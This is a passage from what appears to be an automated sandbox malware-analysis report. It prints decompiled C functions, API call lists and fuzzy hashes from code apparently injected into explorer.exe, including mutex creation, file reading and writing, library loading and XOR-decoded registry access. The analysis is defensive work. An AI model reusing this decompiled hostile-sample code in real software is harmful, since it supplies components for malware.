        						} else {
        							E000C861A( &_v12, _t16);
        							goto L3;
        						}
        					} else {
        						L3:
        						_t12 = 0;
        					}
        				}
        				return _t12;
        			}

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
        • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: 6796c333b43c1c448a21b6fa83f43d0f42b8e702f84117f610061b0c96f96384
        • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
        • Opcode Fuzzy Hash: 6796c333b43c1c448a21b6fa83f43d0f42b8e702f84117f610061b0c96f96384
        • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 111 c590c-c5915 112 c591c-c5932 CreateMutexA 111->112 113 c5917-c591a 111->113 115 c593f-c594a GetLastError 112->115 116 c5934-c593d GetLastError 112->116 114 c596e-c5973 113->114 118 c594c-c5958 call ca4bf 115->118 119 c5965-c596b 115->119 117 c596d 116->117 117->114 118->119 122 c595a-c5963 118->122 119->117 122->117
        C-Code - Quality: 100%
        			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
        				intOrPtr _t10;
        				void* _t13;
        				void* _t19;
        				signed int _t21;
        				signed int _t22;
        
        				_t13 = __edx;
        				if(__ecx != 0) {
        					_t22 = 0;
        					_t19 = CreateMutexA(0, 1, __ecx);
        					if(_t19 != 0) {
        						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
        							_t22 = 1;
        							 *_a4 = _t19;
        						} else {
        							_t10 =  *0xde684; // 0x280f8f0
        							 *((intOrPtr*)(_t10 + 0x30))(_t19);
        						}
        					} else {
        						GetLastError();
        						_t22 = 0xffffffff;
        					}
        				} else {
        					_t22 = _t21 | 0xffffffff;
        				}
        				return _t22;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
        • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        • Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
        • Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 124 c9b43-c9b75 call c8604 127 c9b7e-c9b9e call cb5f6 124->127 128 c9b77-c9b79 124->128 132 c9ba0 127->132 133 c9ba3-c9bb8 call c95c7 127->133 129 c9e1a-c9e1e 128->129 132->133 136 c9cee-c9cfb 133->136 137 c9bbe-c9bd6 133->137 138 c9d3c-c9d4c call c9292 136->138 139 c9cfd-c9d1e 136->139 144 c9bdc-c9bf8 137->144 145 c9ceb 137->145 148 c9d4f-c9d51 138->148 146 c9d54-c9d74 call c85c2 RegOpenKeyExA 139->146 147 c9d20-c9d3a call c9292 139->147 144->146 154 c9bfe-c9c18 call c9292 144->154 145->136 156 c9dc8-c9dcd 146->156 157 c9d76-c9d8b 146->157 147->148 148->146 162 c9d8d-c9db2 call c861a memset call c861a 154->162 163 c9c1e-c9c36 154->163 159 c9dcf 156->159 160 c9dd5 156->160 157->162 165 c9dba-c9dbf 157->165 159->160 164 c9dd8-c9df4 call cc379 160->164 162->165 174 c9c38-c9c7c call c95e1 call c92e5 call c85d5 call c9256 163->174 175 c9cab-c9cb0 163->175 179 c9e0b-c9e18 call c861a 164->179 180 c9df6-c9e09 164->180 170 c9dc1 165->170 171 c9dc3-c9dc6 165->171 170->171 171->164 197 c9c7e-c9c83 174->197 198 c9c8b-c9ca9 call c861a * 2 174->198 182 c9cb6-c9ce9 call c9292 call c861a 175->182 179->129 180->179 180->180 182->146 197->198 199 c9c85 197->199 198->182 199->198
        C-Code - Quality: 89%
        			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				void* _v20;
        				int _v24;
        				void* _v28;
        				char _v32;
        				char _v36;
        				int* _v40;
        				int** _v44;
        				void _v108;
        				int* _t90;
        				int _t91;
        				char* _t92;
        				long _t96;
        				int* _t97;
        				intOrPtr _t98;
        				int* _t101;
        				intOrPtr _t110;
        				int* _t111;
        				int* _t112;
        				intOrPtr _t122;
        				char* _t125;
        				intOrPtr _t126;
        				intOrPtr _t128;
        				int* _t129;
        				intOrPtr _t131;
        				int* _t133;
        				intOrPtr _t134;
        				int* _t135;
        				intOrPtr _t136;
        				char* _t139;
        				int _t143;
        				int _t147;
        				intOrPtr _t148;
        				int* _t149;
        				int* _t154;
        				int** _t155;
        				int* _t161;
        				int* _t163;
        				intOrPtr _t164;
        				intOrPtr _t171;
        				int _t176;
        				char* _t177;
        				char* _t178;
        				char _t179;
        				void* _t180;
        				void* _t181;
        				void* _t183;
        
        				_t176 = 0;
        				_v24 = __edx;
        				_t177 = 0;
        				_v32 = __ecx;
        				_v28 = 0;
        				_v8 = 0x80000001;
        				_v20 = 0;
        				_t155 = E000C8604(0x110);
        				_v44 = _t155;
        				if(_t155 != 0) {
        					_t158 = _a4;
        					_t155[0x42] = _a4;
        					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
        					_t161 = _v108;
        					__eflags = _t161 - 0x61 - 0x19;
        					_t90 = _t161;
        					if(_t161 - 0x61 <= 0x19) {
        						_t90 = _t90 - 0x20;
        						__eflags = _t90;
        					}
        					_v108 = _t90;
        					_t91 = E000C95C7(0x4d2);
        					_t163 = _v24;
        					_v16 = _t91;
        					__eflags = _t163;
        					if(_t163 == 0) {
        						L16:
        						_t164 =  *0xde688; // 0xf0000
        						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
        							_push(_t176);
        							_push( &_v108);
        							_push("\\");
        							_t92 = E000C9292(_t91);
        							_t181 = _t181 + 0x10;
        							L20:
        							_t177 = _t92;
        							_v20 = _t177;
        							goto L21;
        						}
        						_v24 = _t176;
        						_v8 = 0x80000003;
        						_t122 =  *0xde68c; // 0x280fab8
        						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
        						__eflags = _v24 - _t177;
        						if(_v24 == _t177) {
        							goto L21;
        						}
        						_push(_t176);
        						_push( &_v108);
        						_t125 = "\\";
        						_push(_t125);
        						_push(_v16);
        						_push(_t125);
        						_t92 = E000C9292(_v24);
        						_t181 = _t181 + 0x18;
        						goto L20;
        					} else {
        						_t126 =  *0xde688; // 0xf0000
        						_t128 =  *0xde68c; // 0x280fab8
        						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
        						__eflags = _t129;
        						if(_t129 != 0) {
        							_t91 = _v16;
        							goto L16;
        						}
        						_v12 = _t176;
        						_t131 =  *0xde68c; // 0x280fab8
        						_v8 = 0x80000003;
        						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
        						__eflags = _v12 - _t177;
        						if(_v12 == _t177) {
        							L21:
        							E000C85C2( &_v16);
        							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
        							__eflags = _t96;
        							if(_t96 == 0) {
        								_t97 = _a8;
        								__eflags = _t97;
        								if(_t97 != 0) {
        									 *_t97 = 1;
        								}
        								_push(_v28);
        								L30:
        								_t98 =  *0xde68c; // 0x280fab8
        								 *((intOrPtr*)(_t98 + 0x1c))();
        								_t155[0x43] = _v8;
        								_t101 = E000CC379(_t177);
        								 *_t155 = _t101;
        								__eflags = _t101;
        								if(_t101 == 0) {
        									L32:
        									E000C861A( &_v20, 0xffffffff);
        									return _t155;
        								} else {
        									goto L31;
        								}
        								do {
        									L31:
        									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
        									_t176 = _t176 + 1;
        									__eflags = _t176 -  *_t155;
        								} while (_t176 <  *_t155);
        								goto L32;
        							}
        							_v16 = _t176;
        							_t110 =  *0xde68c; // 0x280fab8
        							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
        							__eflags = _t111;
        							if(_t111 == 0) {
        								_t112 = _a8;
        								__eflags = _t112;
        								if(_t112 != 0) {
        									 *_t112 = _t176;
        								}
        								_push(_v16);
        								goto L30;
        							}
        							L23:
        							E000C861A( &_v44, 0x110);
        							memset( &_v108, _t176, 0x40);
        							E000C861A( &_v20, 0xffffffff);
        							goto L1;
        						}
        						_push(_t176);
        						_push(_v16);
        						_t178 = "\\";
        						_push(_t178);
        						_t133 = E000C9292(_v12);
        						_t181 = _t181 + 0x10;
        						_v40 = _t133;
        						__eflags = _t133;
        						if(_t133 == 0) {
        							goto L23;
        						}
        						_t134 =  *0xde68c; // 0x280fab8
        						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
        						__eflags = _t135;
        						if(_t135 == 0) {
        							_t136 =  *0xde68c; // 0x280fab8
        							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
        						} else {
        							_t143 = E000C95E1( &_v36, 0x34);
        							_v24 = _t143;
        							_t179 = E000C92E5(_v32);
        							_v32 = _t179;
        							E000C85D5( &_v24);
        							_t183 = _t181 + 0x18;
        							_t147 = E000C9256(_v12);
        							_v24 = _t147;
        							_t148 =  *0xde68c; // 0x280fab8
        							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
        							__eflags = _t149;
        							if(_t149 == 0) {
        								_t154 = _a12;
        								__eflags = _t154;
        								if(_t154 != 0) {
        									 *_t154 = 1;
        								}
        							}
        							E000C861A( &_v32, 0xfffffffe);
        							E000C861A( &_v24, 0xfffffffe);
        							_t181 = _t183 + 0x10;
        							_t178 = "\\";
        						}
        						_t139 = E000C9292(_v12);
        						_t171 =  *0xde684; // 0x280f8f0
        						_t181 = _t181 + 0x18;
        						_t177 = _t139;
        						_v20 = _t177;
        						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
        						E000C861A( &_v40, 0xffffffff);
        						goto L21;
        					}
        				}
        				L1:
        				return 0;
        			}

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 7cf8feac55d5c6e9e0db613a7901f620fc8ebe02df07073df37a390e1c883798
        • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
        • Opcode Fuzzy Hash: 7cf8feac55d5c6e9e0db613a7901f620fc8ebe02df07073df37a390e1c883798
        • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 204 ca6a9-ca6b9 205 ca6bb-ca6bd 204->205 206 ca6c2-ca6cd call ca63b 204->206 207 ca75b-ca75d 205->207 210 ca757 206->210 211 ca6d3-ca6e5 206->211 212 ca759-ca75a 210->212 214 ca73d-ca748 211->214 215 ca6e7-ca6f8 call c8604 211->215 212->207 214->210 220 ca74a-ca756 call c861a 214->220 215->214 219 ca6fa-ca709 215->219 221 ca72d-ca73b ReadFile 219->221 220->210 221->214 223 ca70b-ca70f 221->223 225 ca75e-ca761 223->225 226 ca711-ca72c 223->226 225->214 227 ca763-ca76c 225->227 226->221 228 ca76e 227->228 229 ca770-ca77b CloseHandle 227->229 228->229 229->212
        C-Code - Quality: 27%
        			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
        				intOrPtr _v8;
        				char _v12;
        				intOrPtr _t26;
        				intOrPtr _t27;
        				intOrPtr _t29;
        				intOrPtr _t34;
        				intOrPtr* _t39;
        				void* _t47;
        				intOrPtr _t55;
        				intOrPtr _t58;
        				char _t60;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t50 = _a4;
        				_t60 = 0;
        				_v12 = 0;
        				if(_a4 != 0) {
        					_t47 = E000CA63B(_t50);
        					if(_t47 == 0) {
        						L11:
        						_t26 = 0;
        						L12:
        						L13:
        						return _t26;
        					}
        					_t27 =  *0xde684; // 0x280f8f0
        					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
        					if(_t58 == 0) {
        						L9:
        						_t29 =  *0xde684; // 0x280f8f0
        						 *((intOrPtr*)(_t29 + 0x30))(_t47);
        						if(_t60 != 0) {
        							E000C861A( &_v12, 0);
        						}
        						goto L11;
        					}
        					_t4 = _t58 + 1; // 0x1
        					_t34 = E000C8604(_t4); // executed
        					_t60 = _t34;
        					_v12 = _t60;
        					if(_t60 == 0) {
        						goto L9;
        					}
        					_a4 = _a4 & 0;
        					_push(0);
        					_v8 = 0;
        					_push( &_a4);
        					_push(_t58);
        					_push(_t60);
        					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
        						if(_a4 == 0) {
        							if(_v8 != _t58) {
        								goto L9;
        							}
        							_t39 = _a8;
        							 *((char*)(_t58 + _t60)) = 0;
        							if(_t39 != 0) {
        								 *_t39 = _t58;
        							}
        							CloseHandle(_t47);
        							_t26 = _t60;
        							goto L12;
        						}
        						_t55 = _v8 + _a4;
        						_a4 = _a4 & 0x00000000;
        						_push(0);
        						_push( &_a4);
        						_v8 = _t55;
        						_push(_t58 - _t55);
        						_push(_t55 + _t60);
        					}
        					goto L9;
        				}
        				_t26 = 0;
        				goto L13;
        			}

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
        • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,0280FD30,00000400), ref: 000CA776
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: d5b9e2c125e3a6782304b39fb1a2c8e3bdc11931331a1832afc7fef28024e27c
        • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
        • Opcode Fuzzy Hash: d5b9e2c125e3a6782304b39fb1a2c8e3bdc11931331a1832afc7fef28024e27c
        • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 100%
        			E000C5CEC() {
        				void _v44;
        				signed int _t8;
        				intOrPtr _t14;
        				intOrPtr _t15;
        				void* _t22;
        				void* _t33;
        
        				_t8 =  *0xde688; // 0xf0000
        				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
        				E000C85EF();
        				E000C8F78();
        				 *0xde780 = 0;
        				 *0xde784 = 0;
        				 *0xde77c = 0;
        				E000C5EB6(); // executed
        				E000CCF84(_t22);
        				_t14 =  *0xde688; // 0xf0000
        				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
        				_t15 =  *0xde688; // 0xf0000
        				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
        				E000CB337( &_v44);
        				memset( &_v44, 0, 0x27);
        				E000C5C26( &_v44, _t33);
        				ExitProcess(0);
        			}

        APIs
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
          • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
          • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
          • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
          • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
          • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        • memset.MSVCRT ref: 000C5D5F
        • ExitProcess.KERNELBASE(00000000,?,?,?), ref: 000C5D72
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Process$Currentmemset$CloseCreateExitFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 1180775259-0
        • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
        • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 247 ce1bc-ce1dc call c95c7 250 ce1de-ce1e4 GetModuleHandleA 247->250 251 ce1e6-ce1eb LoadLibraryA 247->251 252 ce1ed-ce1ef 250->252 251->252 253 ce1fe-ce20c call c85c2 252->253 254 ce1f1-ce1f6 call ce171 252->254 257 ce1fb-ce1fc 254->257 257->253
        C-Code - Quality: 47%
        			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
        				char _v8;
        				char _t5;
        				struct HINSTANCE__* _t7;
        				void* _t10;
        				void* _t12;
        				void* _t22;
        				void* _t25;
        
        				_push(__ecx);
        				_t12 = __ecx;
        				_t22 = __edx;
        				_t5 = E000C95C7(_a4);
        				_t25 = 0;
        				_v8 = _t5;
        				_push(_t5);
        				if(_a4 != 0x7c3) {
        					_t7 = LoadLibraryA(); // executed
        				} else {
        					_t7 = GetModuleHandleA();
        				}
        				if(_t7 != 0) {
        					_t10 = E000CE171(_t12, _t22, _t7); // executed
        					_t25 = _t10;
        				}
        				E000C85C2( &_v8);
        				return _t25;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
        • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 259 ca65c-ca66d 260 ca69e-ca6a0 259->260 261 ca66f-ca691 WriteFile 259->261 264 ca6a1-ca6a4 260->264 262 ca6a5-ca6a7 261->262 263 ca693-ca69c 261->263 262->264 263->260 263->261
        C-Code - Quality: 88%
        			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
        				long _v8;
        				void* _v12;
        				void* _t13;
        				void* _t21;
        				void* _t23;
        				void* _t26;
        
        				_t23 = __ecx;
        				_push(__ecx);
        				_push(__ecx);
        				_t26 = 0;
        				_v12 = __ecx;
        				_t21 = __edx;
        				if(_a4 == 0) {
        					L3:
        					_t13 = 1;
        				} else {
        					while(1) {
        						_v8 = _v8 & 0x00000000;
        						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
        							break;
        						}
        						_t26 = _t26 + _v8;
        						_t23 = _v12;
        						if(_t26 < _a4) {
        							continue;
        						} else {
        							goto L3;
        						}
        						goto L4;
        					}
        					_t13 = 0;
        				}
        				L4:
        				return _t13;
        			}

        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
        • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 265 ca5f7-ca61a CreateFileW 266 ca61c-ca61e 265->266 267 ca620-ca623 265->267 268 ca637-ca63a 266->268 269 ca635 267->269 270 ca625-ca62e 267->270 269->268 270->269
        C-Code - Quality: 100%
        			E000CA5F7(WCHAR* __ecx, long __edx) {
        				intOrPtr _t6;
        				long _t12;
        				void* _t13;
        
        				_t12 = __edx;
        				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
        				if(_t13 != 0xffffffff) {
        					if(_t12 == 4) {
        						_t6 =  *0xde684; // 0x280f8f0
        						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
        					}
        					return _t13;
        				}
        				return 0;
        			}







        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
        • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 271 ca63b-ca65b CreateFileW
        C-Code - Quality: 68%
        			E000CA63B(WCHAR* __ecx) {
        				signed int _t5;
        
        				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
        				_t2 = _t5 + 1; // 0x1
        				asm("sbb ecx, ecx");
        				return _t5 &  ~_t2;
        			}





        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
        • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 272 c8604-c8619 RtlAllocateHeap
        C-Code - Quality: 100%
        			E000C8604(long _a4) {
        				void* _t2;
        
        				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
        				return _t2;
        			}





        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
        • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 273 c85ef-c8603 HeapCreate
        C-Code - Quality: 100%
        			E000C85EF() {
        				void* _t1;
        
        				_t1 = HeapCreate(0, 0x80000, 0); // executed
        				 *0xde768 = _t1;
        				return _t1;
        			}





        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
        • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CF9BF(void* __edx) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				intOrPtr _t26;
        				char _t27;
        				intOrPtr _t29;
        				void* _t31;
        				void* _t36;
        				char _t38;
        				intOrPtr _t39;
        				char _t42;
        				intOrPtr _t51;
        				intOrPtr _t52;
        				intOrPtr* _t63;
        				intOrPtr _t66;
        				char* _t67;
        				intOrPtr _t69;
        				char _t78;
        				void* _t81;
        				void* _t82;
        
        				_t26 =  *0xde654; // 0x280fd30
        				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
        				_v12 = _t27;
        				if(_t27 != 0) {
        					_t63 =  *0xde654; // 0x280fd30
        					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
